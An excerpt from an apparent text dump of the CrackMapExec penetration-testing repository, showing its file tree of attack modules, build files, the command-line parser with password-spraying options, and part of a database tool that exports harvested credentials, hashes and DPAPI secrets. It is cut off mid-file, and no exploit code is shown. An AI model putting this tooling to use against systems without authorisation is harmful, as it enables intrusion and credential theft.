Showing preview only (3,089K chars total). Download the full file or copy to clipboard to get everything.
Repository: byt3bl33d3r/CrackMapExec
Branch: master
Commit: 3c3e412193cb
Files: 194
Total size: 2.9 MB
Directory structure:
gitextract_1_y4acn_/
├── .dockerignore
├── .github/
│ ├── ISSUE_TEMPLATE/
│ │ └── bug_report.md
│ └── workflows/
│ ├── crackmapexec-test.yml
│ └── crackmapexec.yml
├── .gitignore
├── .gitmodules
├── Dockerfile
├── LICENSE
├── Makefile
├── README.md
├── build_collector.py
├── cme/
│ ├── .hooks/
│ │ └── hook-lsassy.py
│ ├── __init__.py
│ ├── cli.py
│ ├── cmedb.py
│ ├── config.py
│ ├── connection.py
│ ├── console.py
│ ├── context.py
│ ├── crackmapexec.py
│ ├── data/
│ │ ├── cme.conf
│ │ ├── default.pem
│ │ ├── keepass_trigger_module/
│ │ │ ├── AddKeePassTrigger.ps1
│ │ │ ├── RemoveKeePassTrigger.ps1
│ │ │ └── RestartKeePass.ps1
│ │ ├── msol_dump/
│ │ │ └── msol_dump.ps1
│ │ ├── veeam_dump_module/
│ │ │ ├── veeam_dump_mssql.ps1
│ │ │ └── veeam_dump_postgresql.ps1
│ │ └── wmiexec_event_vbscripts/
│ │ ├── Exec_Command_Silent.vbs
│ │ └── Exec_Command_WithOutput.vbs
│ ├── first_run.py
│ ├── helpers/
│ │ ├── __init__.py
│ │ ├── bash.py
│ │ ├── bloodhound.py
│ │ ├── http.py
│ │ ├── logger.py
│ │ ├── misc.py
│ │ ├── msada_guids.py
│ │ └── powershell.py
│ ├── loaders/
│ │ ├── __init__.py
│ │ ├── moduleloader.py
│ │ └── protocolloader.py
│ ├── logger.py
│ ├── modules/
│ │ ├── IOXIDResolver.py
│ │ ├── MachineAccountQuota.py
│ │ ├── adcs.py
│ │ ├── add_computer.py
│ │ ├── appcmd.py
│ │ ├── bh_owned.py
│ │ ├── daclread.py
│ │ ├── dfscoerce.py
│ │ ├── drop-sc.py
│ │ ├── empire_exec.py
│ │ ├── enum_av.py
│ │ ├── enum_dns.py
│ │ ├── example_module.py
│ │ ├── find-computer.py
│ │ ├── firefox.py
│ │ ├── get-desc-users.py
│ │ ├── get_netconnections.py
│ │ ├── gpp_autologin.py
│ │ ├── gpp_password.py
│ │ ├── group_members.py
│ │ ├── groupmembership.py
│ │ ├── handlekatz.py
│ │ ├── hash_spider.py
│ │ ├── impersonate.py
│ │ ├── install_elevated.py
│ │ ├── keepass_discover.py
│ │ ├── keepass_trigger.py
│ │ ├── laps.py
│ │ ├── ldap-checker.py
│ │ ├── lsassy_dump.py
│ │ ├── masky.py
│ │ ├── met_inject.py
│ │ ├── ms17-010.py
│ │ ├── msol.py
│ │ ├── mssql_priv.py
│ │ ├── nanodump.py
│ │ ├── nopac.py
│ │ ├── ntdsutil.py
│ │ ├── ntlmv1.py
│ │ ├── petitpotam.py
│ │ ├── pi.py
│ │ ├── printnightmare.py
│ │ ├── procdump.py
│ │ ├── pso.py
│ │ ├── rdcman.py
│ │ ├── rdp.py
│ │ ├── reg-query.py
│ │ ├── runasppl.py
│ │ ├── scan-network.py
│ │ ├── scuffy.py
│ │ ├── shadowcoerce.py
│ │ ├── slinky.py
│ │ ├── spider_plus.py
│ │ ├── spooler.py
│ │ ├── subnets.py
│ │ ├── teams_localdb.py
│ │ ├── test_connection.py
│ │ ├── trust.py
│ │ ├── uac.py
│ │ ├── user_desc.py
│ │ ├── veeam_dump.py
│ │ ├── wcc.py
│ │ ├── wdigest.py
│ │ ├── web_delivery.py
│ │ ├── webdav.py
│ │ ├── whoami.py
│ │ ├── winscp_dump.py
│ │ ├── wireless.py
│ │ └── zerologon.py
│ ├── parsers/
│ │ ├── __init__.py
│ │ ├── ip.py
│ │ ├── nessus.py
│ │ └── nmap.py
│ ├── paths.py
│ ├── protocols/
│ │ ├── __init__.py
│ │ ├── ftp/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── ftp.py
│ │ ├── ldap/
│ │ │ ├── __init__.py
│ │ │ ├── bloodhound.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ ├── gmsa.py
│ │ │ ├── kerberos.py
│ │ │ ├── laps.py
│ │ │ └── proto_args.py
│ │ ├── ldap.py
│ │ ├── mssql/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ ├── mssqlexec.py
│ │ │ └── proto_args.py
│ │ ├── mssql.py
│ │ ├── rdp/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── rdp.py
│ │ ├── smb/
│ │ │ ├── __init__.py
│ │ │ ├── atexec.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ ├── firefox.py
│ │ │ ├── mmcexec.py
│ │ │ ├── passpol.py
│ │ │ ├── proto_args.py
│ │ │ ├── remotefile.py
│ │ │ ├── samrfunc.py
│ │ │ ├── samruser.py
│ │ │ ├── smbexec.py
│ │ │ ├── smbspider.py
│ │ │ └── wmiexec.py
│ │ ├── smb.py
│ │ ├── ssh/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── ssh.py
│ │ ├── vnc/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── vnc.py
│ │ ├── winrm/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── winrm.py
│ │ ├── wmi/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ ├── proto_args.py
│ │ │ ├── wmiexec.py
│ │ │ └── wmiexec_event.py
│ │ └── wmi.py
│ └── servers/
│ ├── __init__.py
│ ├── http.py
│ └── smb.py
├── crackmapexec.spec
├── flake.nix
├── pyproject.toml
├── shell.nix
└── tests/
├── README.md
├── data/
│ ├── test_key.priv
│ ├── test_passwords.txt
│ └── test_users.txt
├── e2e_commands.txt
├── e2e_test.py
└── test_smb_database.py
================================================
FILE CONTENTS
================================================
================================================
FILE: .dockerignore
================================================
tests
Dockerfile
*.pyc
*.pyo
*.pyd
__pycache__
.vscode
.venv
.github
build
bin
dist
*.egg-info
cme/data/powersploit/Recon/Dictionaries
cme/data/powersploit/Exfiltration/NTFSParser
cme/data/powersploit/CodeExecution/Invoke-ReflectivePEInjection_Resources
cme/data/powersploit/Exfiltration/LogonUser
cme/data/powersploit/Tests
cme/data/netripper/DLL
cme/data/netripper/Metasploit
cme/data/netripper/NetRipper
cme/data/netripper/Win32
cme/data/netripper/Release
cme/data/netripper/minhook
cme/data/netripper/x64
cme/data/netripper/*.pdf
cme/data/netripper/*.sln
cme/data/invoke-vnc/winvnc
cme/data/invoke-vnc/vncdll
cme/data/invoke-vnc/pebytes.ps1
cme/data/invoke-vnc/ReflectiveDLLInjection
cme/data/invoke-vnc/*.py
cme/data/invoke-vnc/*.bat
cme/data/invoke-vnc/*.msbuild
cme/data/invoke-vnc/*.sln
cme/data/RID-Hijacking/modules
cme/data/RID-Hijacking/slides
================================================
FILE: .github/ISSUE_TEMPLATE/bug_report.md
================================================
---
name: Bug report
about: Create a report to help us improve
title: ''
labels: ''
assignees: ''
---
**Describe the bug**
A clear and concise description of what the bug is.
**To Reproduce**
Steps to reproduce the behavior i.e.:
Command: `crackmapexec smb -u username -p password`
Resulted in:
```
crackmapexec smb 10.10.10.10 -u username -p password -x "whoami"
SMB 10.10.10.10 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:domain) (signing:True) (SMBv1:False)
SMB 10.10.10.10 445 DC01 [+] domain\username:password
Traceback (most recent call last):
...
```
**Expected behavior**
A clear and concise description of what you expected to happen.
**Screenshots**
If applicable, add screenshots to help explain your problem.
**Crackmapexec info**
- OS: [e.g. Kali]
- Version of CME [e.g. v5.0.2]
- Installed from: apt/github/pip/docker/...? Please try with latest release before openning an issue
**Additional context**
Add any other context about the problem here.
================================================
FILE: .github/workflows/crackmapexec-test.yml
================================================
name: CrackMapExec Tests
on:
workflow_dispatch:
push:
branches: [ master ]
pull_request:
branches: [ master ]
jobs:
build:
name: CrackMapExec Tests for Py${{ matrix.python-version }}
runs-on: ${{ matrix.os }}
strategy:
max-parallel: 4
matrix:
os: [ubuntu-latest]
python-version: ["3.7", "3.8", "3.9", "3.10", "3.11"]
steps:
- uses: actions/checkout@v3
- name: CrackMapExec tests on ${{ matrix.os }}
uses: actions/setup-python@v4
with:
python-version: ${{ matrix.python-version }}
- name: Install poetry
run: |
pipx install poetry --python python${{ matrix.python-version }}
poetry --version
poetry env info
- name: Install librairies with dev group
run: |
poetry install --with dev
- name: Run the e2e test
run: |
poetry run pytest tests
================================================
FILE: .github/workflows/crackmapexec.yml
================================================
name: CrackMapExec Tests & Build
on:
workflow_dispatch:
branches: [ main ]
push:
branches: [ main ]
pull_request:
branches: [ main ]
jobs:
build:
name: CrackMapExec Tests on ${{ matrix.os }}
runs-on: ${{ matrix.os }}
strategy:
max-parallel: 4
matrix:
os: [ubuntu-latest, macOS-latest, windows-latest]
python-version: ["3.8", "3.9", "3.10", "3.11"]
steps:
- uses: actions/checkout@v3
- name: CrackMapExec tests on ${{ matrix.os }}
uses: actions/setup-python@v4
with:
python-version: ${{ matrix.python-version }}
- name: Build binaries with Shiv
run: |
pip install shiv
python build_collector.py
- name: Upload cme binary
uses: actions/upload-artifact@master
with:
name: cme-${{ matrix.os }}-${{ matrix.python-version }}
path: bin/cme
- name: Upload cmedb binary
uses: actions/upload-artifact@master
with:
name: cmedb-${{ matrix.os }}-${{ matrix.python-version }}
path: bin/cmedb
================================================
FILE: .gitignore
================================================
data/cme.db
*.bak
*.log
.venv
.vscode
.idea
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
bin/
# C extensions
*.so
# Distribution / packaging
.Python
env/
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
*.egg-info/
.installed.cfg
*.egg
# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
!crackmapexec.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*,cover
# Translations
*.mo
*.pot
# Django stuff:
*.log
# Sphinx documentation
docs/_build/
# PyBuilder
target/
================================================
FILE: .gitmodules
================================================
================================================
FILE: Dockerfile
================================================
FROM python:3.11-slim
ENV LANG=C.UTF-8
ENV LC_ALL=C.UTF-8
ENV PIP_NO_CACHE_DIR=off
WORKDIR /usr/src/crackmapexec
RUN apt-get update && \
apt-get install -y libffi-dev libxml2-dev libxslt-dev libssl-dev openssl autoconf g++ python3-dev curl git
RUN apt-get update
# Get Rust
RUN curl https://sh.rustup.rs -sSf | bash -s -- -y
# Add .cargo/bin to PATH
ENV PATH="/root/.cargo/bin:${PATH}"
# Check cargo is visible
RUN cargo --help
COPY . .
RUN pip install .
ENTRYPOINT [ "cme" ]
================================================
FILE: LICENSE
================================================
Copyright (c) 2022, byt3bl33d3r, mpgn_x64
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
================================================
FILE: Makefile
================================================
.PHONY: tests
default: build
clean:
rm -f -r build/
rm -f -r bin/
rm -f -r dist/
find . -name '*.pyc' -exec rm -f {} +
find . -name '*.pyo' -exec rm -f {} +
find . -name '*~' -exec rm -f {} +
find . -name '__pycache__' -exec rm -rf {} +
find . -name '.pytest_cache' -exec rm -rf {} +
tests:
flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics --exclude cme/data/*
requirements:
poetry export --without-hashes -f requirements.txt -o requirements.txt
poetry export --without-hashes --dev -f requirements.txt -o requirements-dev.txt
================================================
FILE: README.md
================================================
# No Longer Maintained
This project is no longer mantained due to the existence of a hostile fork.
# CrackMapExec
<p align="center">
<img src="https://cloud.githubusercontent.com/assets/5151193/17577511/d312ceb4-5f3b-11e6-8de5-8822246289fd.jpg" alt="cme"/>
</p>
You are on the **latest up-to-date** repository of the project CrackMapExec ! 🎉
- 🚧 If you want to report a problem, open un [Issue](https://github.com/mpgn/CrackMapExec/issues)
- 🔀 If you want to contribute, open a [Pull Request](https://github.com/mpgn/CrackMapExec/pulls)
- 💬 If you want to discuss, open a [Discussion](https://github.com/mpgn/CrackMapExec/discussions)
# Acknowledgments
**(These are the people who did the hard stuff)**
This project was originally inspired by:
- [CredCrack](https://github.com/gojhonny/CredCrack)
- [smbexec](https://github.com/pentestgeek/smbexec)
- [smbmap](https://github.com/ShawnDEvans/smbmap)
Unintentional contributors:
- The [Empire](https://github.com/PowerShellEmpire/Empire) project
- @T-S-A's [smbspider](https://github.com/T-S-A/smbspider) script
- @ConsciousHacker's partial Python port of Invoke-obfuscation from the [GreatSCT](https://github.com/GreatSCT/GreatSCT) project
# Documentation, Tutorials, Examples
See the project's [wiki](https://www.crackmapexec.wiki/) for documentation and usage examples
# Installation
Please see the installation instructions on the [official wiki](https://www.crackmapexec.wiki/getting-started/installation)
# Code Contributors
Awesome code contributors of CME:
[](https://github.com/Marshall-Hallenbeck)
[](https://github.com/zblurx)
[](https://github.com/NeffIsBack)
[](https://github.com/Hackndo)
[](https://github.com/nurfed1)
# To do
- ~~0wn everything~~
================================================
FILE: build_collector.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import shutil
import subprocess
import sys
import time
from datetime import datetime
from pathlib import Path
from shiv.bootstrap import Environment
# from distutils.ccompiler import new_compiler
from shiv.builder import create_archive
from shiv.cli import __version__ as VERSION
def build_cme():
print("building CME")
try:
shutil.rmtree("bin")
shutil.rmtree("build")
except Exception as e:
pass
try:
print("remove useless files")
os.mkdir("build")
os.mkdir("bin")
shutil.copytree("cme", "build/cme")
except Exception as e:
print(e)
return
subprocess.run(
[
sys.executable,
"-m",
"pip",
"install",
"-e",
".",
"-t",
"build",
],
check=True,
)
# [shutil.rmtree(p) for p in Path("build").glob("**/__pycache__")]
[shutil.rmtree(p) for p in Path("build").glob("**/*.dist-info")]
env = Environment(
built_at=datetime.utcfromtimestamp(int(time.time())).strftime("%Y-%m-%d %H:%M:%S"),
entry_point="cme.crackmapexec:main",
script=None,
compile_pyc=False,
extend_pythonpath=True,
shiv_version=VERSION,
)
create_archive(
[Path("build").absolute()],
Path("bin/cme"),
"/usr/bin/env -S python -sE",
"_bootstrap:bootstrap",
env,
True,
)
def build_cmedb():
print("building CMEDB")
env = Environment(
built_at=datetime.utcfromtimestamp(int(time.time())).strftime("%Y-%m-%d %H:%M:%S"),
entry_point="cme.cmedb:main",
script=None,
compile_pyc=False,
extend_pythonpath=True,
shiv_version=VERSION,
)
create_archive(
[Path("build").absolute()],
Path("bin/cmedb"),
"/usr/bin/env -S python -sE",
"_bootstrap:bootstrap",
env,
True,
)
if __name__ == "__main__":
try:
build_cme()
build_cmedb()
except:
pass
finally:
shutil.rmtree("build")
================================================
FILE: cme/.hooks/hook-lsassy.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from PyInstaller.utils.hooks import collect_all
datas, binaries, hiddenimports = collect_all("lsassy")
================================================
FILE: cme/__init__.py
================================================
================================================
FILE: cme/cli.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import sys
from argparse import RawTextHelpFormatter
from cme.loaders.protocolloader import ProtocolLoader
from cme.helpers.logger import highlight
from termcolor import colored
from cme.logger import cme_logger
import importlib.metadata
def gen_cli_args():
VERSION = importlib.metadata.version("crackmapexec")
CODENAME = "John Wick"
parser = argparse.ArgumentParser(description=f"""
______ .______ ___ ______ __ ___ .___ ___. ___ .______ _______ ___ ___ _______ ______
/ || _ \ / \ / || |/ / | \/ | / \ | _ \ | ____|\ \ / / | ____| / |
| ,----'| |_) | / ^ \ | ,----'| ' / | \ / | / ^ \ | |_) | | |__ \ V / | |__ | ,----'
| | | / / /_\ \ | | | < | |\/| | / /_\ \ | ___/ | __| > < | __| | |
| `----.| |\ \----. / _____ \ | `----.| . \ | | | | / _____ \ | | | |____ / . \ | |____ | `----.
\______|| _| `._____|/__/ \__\ \______||__|\__\ |__| |__| /__/ \__\ | _| |_______|/__/ \__\ |_______| \______|
A swiss army knife for pentesting networks
Forged by @byt3bl33d3r and @mpgn_x64 using the powah of dank memes
{highlight('Version', 'red')} : {highlight(VERSION)}
{highlight('Codename', 'red')}: {highlight(CODENAME)}
""",
formatter_class=RawTextHelpFormatter,
)
parser.add_argument(
"-t",
type=int,
dest="threads",
default=100,
help="set how many concurrent threads to use (default: 100)",
)
parser.add_argument(
"--timeout",
default=None,
type=int,
help="max timeout in seconds of each thread (default: None)",
)
parser.add_argument(
"--jitter",
metavar="INTERVAL",
type=str,
help="sets a random delay between each connection (default: None)",
)
parser.add_argument(
"--no-progress",
action="store_true",
help="Not displaying progress bar during scan",
)
parser.add_argument("--verbose", action="store_true", help="enable verbose output")
parser.add_argument("--debug", action="store_true", help="enable debug level information")
parser.add_argument("--version", action="store_true", help="Display CME version")
# we do module arg parsing here so we can reference the module_list attribute below
module_parser = argparse.ArgumentParser(add_help=False)
mgroup = module_parser.add_mutually_exclusive_group()
mgroup.add_argument("-M", "--module", action="append", metavar="MODULE", help="module to use")
module_parser.add_argument(
"-o",
metavar="MODULE_OPTION",
nargs="+",
default=[],
dest="module_options",
help="module options",
)
module_parser.add_argument("-L", "--list-modules", action="store_true", help="list available modules")
module_parser.add_argument(
"--options",
dest="show_module_options",
action="store_true",
help="display module options",
)
module_parser.add_argument(
"--server",
choices={"http", "https"},
default="https",
help="use the selected server (default: https)",
)
module_parser.add_argument(
"--server-host",
type=str,
default="0.0.0.0",
metavar="HOST",
help="IP to bind the server to (default: 0.0.0.0)",
)
module_parser.add_argument(
"--server-port",
metavar="PORT",
type=int,
help="start the server on the specified port",
)
module_parser.add_argument(
"--connectback-host",
type=str,
metavar="CHOST",
help="IP for the remote system to connect back to (default: same as server-host)",
)
subparsers = parser.add_subparsers(title="protocols", dest="protocol", description="available protocols")
std_parser = argparse.ArgumentParser(add_help=False)
std_parser.add_argument(
"target",
nargs="+" if not (module_parser.parse_known_args()[0].list_modules or module_parser.parse_known_args()[0].show_module_options) else "*",
type=str,
help="the target IP(s), range(s), CIDR(s), hostname(s), FQDN(s), file(s) containing a list of targets, NMap XML or .Nessus file(s)",
)
std_parser.add_argument(
"-id",
metavar="CRED_ID",
nargs="+",
default=[],
type=str,
dest="cred_id",
help="database credential ID(s) to use for authentication",
)
std_parser.add_argument(
"-u",
metavar="USERNAME",
dest="username",
nargs="+",
default=[],
help="username(s) or file(s) containing usernames",
)
std_parser.add_argument(
"-p",
metavar="PASSWORD",
dest="password",
nargs="+",
default=[],
help="password(s) or file(s) containing passwords",
)
std_parser.add_argument("-k", "--kerberos", action="store_true", help="Use Kerberos authentication")
std_parser.add_argument("--no-bruteforce", action="store_true", help="No spray when using file for username and password (user1 => password1, user2 => password2")
std_parser.add_argument("--continue-on-success", action="store_true", help="continues authentication attempts even after successes")
std_parser.add_argument(
"--use-kcache",
action="store_true",
help="Use Kerberos authentication from ccache file (KRB5CCNAME)",
)
std_parser.add_argument("--log", metavar="LOG", help="Export result into a custom file")
std_parser.add_argument(
"--aesKey",
metavar="AESKEY",
nargs="+",
help="AES key to use for Kerberos Authentication (128 or 256 bits)",
)
std_parser.add_argument(
"--kdcHost",
metavar="KDCHOST",
help="FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter",
)
fail_group = std_parser.add_mutually_exclusive_group()
fail_group.add_argument(
"--gfail-limit",
metavar="LIMIT",
type=int,
help="max number of global failed login attempts",
)
fail_group.add_argument(
"--ufail-limit",
metavar="LIMIT",
type=int,
help="max number of failed login attempts per username",
)
fail_group.add_argument(
"--fail-limit",
metavar="LIMIT",
type=int,
help="max number of failed login attempts per host",
)
p_loader = ProtocolLoader()
protocols = p_loader.get_protocols()
for protocol in protocols.keys():
try:
protocol_object = p_loader.load_protocol(protocols[protocol]["argspath"])
subparsers = protocol_object.proto_args(subparsers, std_parser, module_parser)
except:
cme_logger.exception(f"Error loading proto_args from proto_args.py file in protocol folder: {protocol}")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
if args.version:
print(f"{VERSION} - {CODENAME}")
sys.exit(1)
return args
================================================
FILE: cme/cmedb.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import cmd
import configparser
import csv
import os
from os import listdir
from os.path import exists
from os.path import join as path_join
import shutil
from sqlite3 import connect
import sys
from textwrap import dedent
from requests import get, post, ConnectionError
from sqlalchemy import create_engine
from terminaltables import AsciiTable
from cme.loaders.protocolloader import ProtocolLoader
from cme.paths import CONFIG_PATH, WS_PATH, WORKSPACE_DIR
class UserExitedProto(Exception):
pass
def create_db_engine(db_path):
db_engine = create_engine(f"sqlite:///{db_path}", isolation_level="AUTOCOMMIT", future=True)
return db_engine
def print_table(data, title=None):
print("")
table = AsciiTable(data)
if title:
table.title = title
print(table.table)
print("")
def write_csv(filename, headers, entries):
"""
Writes a CSV file with the provided parameters.
"""
with open(os.path.expanduser(filename), "w") as export_file:
csv_file = csv.writer(
export_file,
delimiter=";",
quoting=csv.QUOTE_ALL,
lineterminator="\n",
escapechar="\\",
)
csv_file.writerow(headers)
for entry in entries:
csv_file.writerow(entry)
def write_list(filename, entries):
"""
Writes a file with a simple list
"""
with open(os.path.expanduser(filename), "w") as export_file:
for line in entries:
export_file.write(line + "\n")
return
def complete_import(text, line):
"""
Tab-complete 'import' commands
"""
commands = ("empire", "metasploit")
mline = line.partition(" ")[2]
offs = len(mline) - len(text)
return [s[offs:] for s in commands if s.startswith(mline)]
def complete_export(text, line):
"""
Tab-complete 'creds' commands.
"""
commands = (
"creds",
"plaintext",
"hashes",
"shares",
"local_admins",
"signing",
"keys",
)
mline = line.partition(" ")[2]
offs = len(mline) - len(text)
return [s[offs:] for s in commands if s.startswith(mline)]
def print_help(help_string):
print(dedent(help_string))
class DatabaseNavigator(cmd.Cmd):
def __init__(self, main_menu, database, proto):
cmd.Cmd.__init__(self)
self.main_menu = main_menu
self.config = main_menu.config
self.proto = proto
self.db = database
self.prompt = f"cmedb ({main_menu.workspace})({proto}) > "
def do_exit(self, line):
self.db.shutdown_db()
sys.exit()
@staticmethod
def help_exit():
help_string = """
Exits
"""
print_help(help_string)
def do_back(self, line):
raise UserExitedProto
def do_export(self, line):
if not line:
print("[-] not enough arguments")
return
line = line.split()
command = line[0].lower()
# Need to use if/elif/else to keep compatibility with py3.8/3.9
# Reference DB Function cme/protocols/smb/database.py
# Users
if command == "creds":
if len(line) < 3:
print("[-] invalid arguments, export creds <simple|detailed|hashcat> <filename>")
return
filename = line[2]
creds = self.db.get_credentials()
csv_header = (
"id",
"domain",
"username",
"password",
"credtype",
"pillaged_from",
)
if line[1].lower() == "simple":
write_csv(filename, csv_header, creds)
elif line[1].lower() == "detailed":
formatted_creds = []
for cred in creds:
entry = [
cred[0], # ID
cred[1], # Domain
cred[2], # Username
cred[3], # Password/Hash
cred[4], # Cred Type
]
if cred[5] is None:
entry.append("")
else:
entry.append(self.db.get_hosts(cred[5])[0][2])
formatted_creds.append(entry)
write_csv(filename, csv_header, formatted_creds)
elif line[1].lower() == "hashcat":
usernames = []
passwords = []
for cred in creds:
if cred[4] == "hash":
usernames.append(cred[2])
passwords.append(cred[3])
output_list = [':'.join(combination) for combination in zip(usernames, passwords)]
write_list(filename, output_list)
else:
print(f"[-] No such export option: {line[1]}")
return
print("[+] Creds exported")
# Hosts
elif command == "hosts":
if len(line) < 3:
print("[-] invalid arguments, export hosts <simple|detailed|signing> <filename>")
return
csv_header_simple = (
"id",
"ip",
"hostname",
"domain",
"os",
"dc",
"smbv1",
"signing",
)
csv_header_detailed = (
"id",
"ip",
"hostname",
"domain",
"os",
"dc",
"smbv1",
"signing",
"spooler",
"zerologon",
"petitpotam",
)
filename = line[2]
if line[1].lower() == "simple":
hosts = self.db.get_hosts()
simple_hosts = [host[:8] for host in hosts]
write_csv(filename, csv_header_simple, simple_hosts)
# TODO: maybe add more detail like who is an admin on it, shares discovered, etc
elif line[1].lower() == "detailed":
hosts = self.db.get_hosts()
write_csv(filename, csv_header_detailed, hosts)
elif line[1].lower() == "signing":
hosts = self.db.get_hosts("signing")
signing_hosts = [host[1] for host in hosts]
write_list(filename, signing_hosts)
else:
print(f"[-] No such export option: {line[1]}")
return
print("[+] Hosts exported")
# Shares
elif command == "shares":
if len(line) < 3:
print("[-] invalid arguments, export shares <simple|detailed> <filename>")
return
shares = self.db.get_shares()
csv_header = ("id", "host", "userid", "name", "remark", "read", "write")
filename = line[2]
if line[1].lower() == "simple":
write_csv(filename, csv_header, shares)
print("[+] shares exported")
# Detailed view gets hostname, usernames, and true false statement
elif line[1].lower() == "detailed":
formatted_shares = []
for share in shares:
user = self.db.get_users(share[2])[0]
if self.db.get_hosts(share[1]):
share_host = self.db.get_hosts(share[1])[0][2]
else:
share_host = "ERROR"
entry = (
share[0], # shareID
share_host, # hosts
f"{user[1]}\{user[2]}", # userID
share[3], # name
share[4], # remark
bool(share[5]), # read
bool(share[6]), # write
)
formatted_shares.append(entry)
write_csv(filename, csv_header, formatted_shares)
print("[+] Shares exported")
else:
print(f"[-] No such export option: {line[1]}")
return
# Local Admin
elif command == "local_admins":
if len(line) < 3:
print("[-] invalid arguments, export local_admins <simple|detailed> <filename>")
return
# These values don't change between simple and detailed
local_admins = self.db.get_admin_relations()
csv_header = ("id", "userid", "host")
filename = line[2]
if line[1].lower() == "simple":
write_csv(filename, csv_header, local_admins)
elif line[1].lower() == "detailed":
formatted_local_admins = []
for entry in local_admins:
user = self.db.get_users(filter_term=entry[1])[0]
formatted_entry = (
entry[0], # Entry ID
f"{user[1]}/{user[2]}", # DOMAIN/Username
self.db.get_hosts(filter_term=entry[2])[0][2], # Hostname
)
# Can't modify a tuple which is what self.db.get_admin_relations() returns
formatted_local_admins.append(formatted_entry)
write_csv(filename, csv_header, formatted_local_admins)
else:
print(f"[-] No such export option: {line[1]}")
return
print("[+] Local Admins exported")
elif command == "dpapi":
if len(line) < 3:
print("[-] invalid arguments, export dpapi <simple|detailed> <filename>")
return
# These values don't change between simple and detailed
dpapi_secrets = self.db.get_dpapi_secrets()
csv_header = (
"id",
"host",
"dpapi_type",
"windows_user",
"username",
"password",
"url",
)
filename = line[2]
if line[1].lower() == "simple":
write_csv(filename, csv_header, dpapi_secrets)
elif line[1].lower() == "detailed":
formatted_dpapi_secret = []
for entry in dpapi_secrets:
formatted_entry = (
entry[0], # Entry ID
self.db.get_hosts(filter_term=entry[1])[0][2], # Hostname
entry[2], # DPAPI type
entry[3], # Windows User
entry[4], # Username
entry[5], # Password
entry[6], # URL
)
# Can't modify a tuple which is what self.db.get_admin_relations() returns
formatted_dpapi_secret.append(formatted_entry)
write_csv(filename, csv_header, formatted_dpapi_secret)
else:
print(f"[-] No such export option: {line[1]}")
return
print("[+] DPAPI secrets exported")
elif command == "keys":
if line[1].lower() == "all":
keys = self.db.get_keys()
else:
keys = self.db.get_keys(key_id=int(line[1]))
writable_keys = [key[2] for key in keys]
filename = line[2]
write_list(filename, writable_keys)
elif command == "wcc":
if len(line) < 3:
print("[-] invalid arguments, export wcc <simple|detailed> <filename>")
return
csv_header_simple = (
"id",
"ip",
"hostname",
"check",
"status",
)
csv_header_detailed = (
"id",
"ip",
"hostname",
"check",
"description",
"status",
"reasons"
)
filename = line[2]
host_mapping = {}
check_mapping = {}
hosts = self.db.get_hosts()
checks = self.db.get_checks()
check_results = self.db.get_check_results()
rows = []
for result_id,hostid,checkid,secure,reasons in check_results:
row = [result_id]
if hostid in host_mapping:
row.extend(host_mapping[hostid])
else:
for host_id,ip,hostname,_,_,_,_,_,_,_,_ in hosts:
if host_id == hostid:
row.extend([ip, hostname])
host_mapping[hostid] = [ip, hostname]
break
if checkid in check_mapping:
row.extend(check_mapping[checkid])
else:
for check in checks:
check_id, name, description = check
if check_id == checkid:
row.extend([name, description])
check_mapping[checkid] = [name, description]
break
row.append('OK' if secure else 'KO')
row.append(reasons)
rows.append(row)
if line[1].lower() == "simple":
